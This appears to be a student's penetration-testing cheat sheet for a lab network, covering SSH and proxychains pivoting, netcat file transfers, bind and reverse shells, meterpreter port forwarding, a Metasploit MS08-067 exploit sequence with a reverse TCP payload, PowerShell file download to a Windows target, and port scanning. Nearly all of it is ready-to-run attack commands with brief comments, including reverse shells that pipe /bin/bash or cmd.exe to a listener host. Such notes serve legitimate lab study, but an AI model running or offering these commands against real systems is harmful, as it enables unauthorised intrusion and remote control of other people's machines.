communication

stuff

text

PIVOTING:

box1 box2 box3 box4

10.11.1.99 10.11.2.2 10.11.3.2 10.11.4.2

ssh -D 6666 10.11.2.2

- open port 6666 on local machine

proxychains firefox (or nmap or whatever)

- brings a firefox browser up

- surf to 10.11.3.2, traffic will go thru 10.11.2.2

proxychains ssh -D 7777 10.11.3.2

- open port 7777 on local machine

- surf to 10.11.4.2, traffic will go thru 10.11.2.2 and 10.11.3.2

etc etc etc

also, edit proxychains.conf????? to have the newest IP on top

avoid pivoting through Windows machines

This can also be done through meterpreter

###########################################################

var/www/html

systemctl start apache2

###########################################################

To transfer a file to the Windows lab box:

$url = "http://10.11.0.81/18176.py"

$output = "C:\users\administrator\18176.py"

$start_time = Get-Date

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $output)

#OR

(New-Object System.Net.WebClient).DownloadFile($url, $output)

###########################################################

To transfer a file to the Windows box:

zip it and grab it thru Internet Explorer

To transfer a file from the Windows box:

command: nc -nlvp 4444 > 18176.exe

windows: nc -nv 10.0.0.22 4444 < 18176.exe

###########################################################

in meterpreter:

portfwd add -l 445 -p 445 -r 10.11.1.229

- this portfwd command attaches kali's port 445 to port 445 on the victim machine through the meterpreter connection already running.

msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set rhost 127.0.0.1

msf exploit(ms08_067_netapi) > set lport 6666

msf exploit(ms08_067_netapi) > set lhost 10.11.0.81

msf exploit(ms08_067_netapi) > exploit

- this string of commands attacks the kali box (127.0.0.1) which then forwards all this to the mail server and returns a prompt.

netcat:

- check TCP port:

nc -nv 10.11.1.7

- set up a listening post

nc -nlvp 4444

- connect to listening post

nc -nv 10.11.0.81 4444

- transfer a file

nc -nlvp 4444 > incoming.exe

nc - nv 10.11.0.81 4444 < /usr/share/windows-binaries/wget.exe

note: no feedback expected

- bind a shell

nc -nlvp 4444 -e cmd.exe

nc -nv 10.11.0.81 4444

- reverse shell

nc -nlvp 4444

nc -nv 10.0.0.22 4444 -e /bin/bash

- port scanning

nc -nvv -w 1 -z 10.11.1.7 999-1999

nmap -sT -p 1-65535 10.11.1.7